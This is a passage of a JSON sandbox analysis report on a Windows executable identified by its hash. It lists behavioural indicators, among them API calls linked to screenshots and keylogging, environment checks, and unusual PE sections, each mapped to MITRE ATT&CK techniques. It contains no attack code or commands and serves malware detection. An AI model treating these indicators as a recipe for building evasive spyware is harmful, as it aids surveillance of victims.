\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4712832'}\" (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"LoadResource with parameter {'hModule': '1987903488', 'hResInfo': '2688496'}\" (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4713216'}\" (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4713200'}\" (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4713184'}\" (UID: 00000000-00005520)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"BSS\" is zero\n Raw size of \".tls\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005520)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00005520)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-150", "type": 6, "relevance": 5, "name": "Calls an API typically used to get handle of currently active window", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetActiveWindow\" (UID: 00000000-00005520)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-138", "type": 3, "relevance": 1, "name": "Queries for Borland Delphi related registry entry", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\BORLAND\\DELPHI\\LOCALES\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005520)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"IsWow64Process\" with parameter \"5520\" - (UID: 00000000-00005520)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-152", "type": 6, "relevance": 3, "name": "Calls an API typically used to enumerate active windows", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"EnumWindows\" with parameter \"1244408\" - (UID: 00000000-00005520)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"335613181\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"3724610946\"\n \"cx\": \"0\"\n \"cy\": \"25\"}\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"838929297\"\n \"cx\": \"320\"\n \"cy\": \"25\"}\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"838929297\"\n \"cx\": \"1296\"\n \"cy\": \"30\"}\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"3724610946\"\n \"cx\": \"320\"\n \"cy\": \"25\"}\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"3724610946\"\n \"cx\": \"1011\"\n \"cy\": \"25\"}\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"838929297\"\n \"cx\": \"1011\"\n \"cy\": \"25\"}\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"838929297\"\n \"cx\": \"0\"\n \"cy\": \"25\"}\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"838929297\"\n \"cx\": \"390\"\n \"cy\": \"25\"}\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"3724610946\"\n \"cx\": \"1296\"\n \"cy\": \"30\"}\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"335613181\"\n \"cx\": \"0\"\n \"cy\": \"25\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5\" has a section named \"CODE\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5\" has a section named \"DATA\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5\" has a section named \"BSS\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"GetLongPathNameA\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: KERNELBASE.DLL)\n Found string \"GetDiskFreeSpaceExA\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: KERNELBASE.DLL)\n Found string \"VariantChangeTypeEx\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"VarNeg\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"VarNot\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"VarAdd\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"VarSub\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"VarMul\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"VarDiv\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"VarIdiv\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"VarMod\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"VarAnd\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"VarOr\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"VarXor\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"VarCmp\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"VarI4FromStr\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"VarR4FromStr\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"VarR8FromStr\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"VarDateFromStr\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"VarCyFromStr\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"VarBoolFromStr\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"VarBstrFromCy\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"VarBstrFromDate\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"VarBstrFromBool\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: OLEAUT32.DLL)\n Found string \"InitCommonControlsEx\" (Source: 395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5, API is part of module: COMCTL32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5\" has section name CODE with entropy \"6.50925521331\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5\" has section name .reloc with entropy \"6.62743872884\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-40", "type": 6, "relevance": 10, "name": "Calls an API typically used for keylogging", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetKeyState\" with parameters {\"nVirtKey\": \"18\"}", "origin": "API Call", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}]}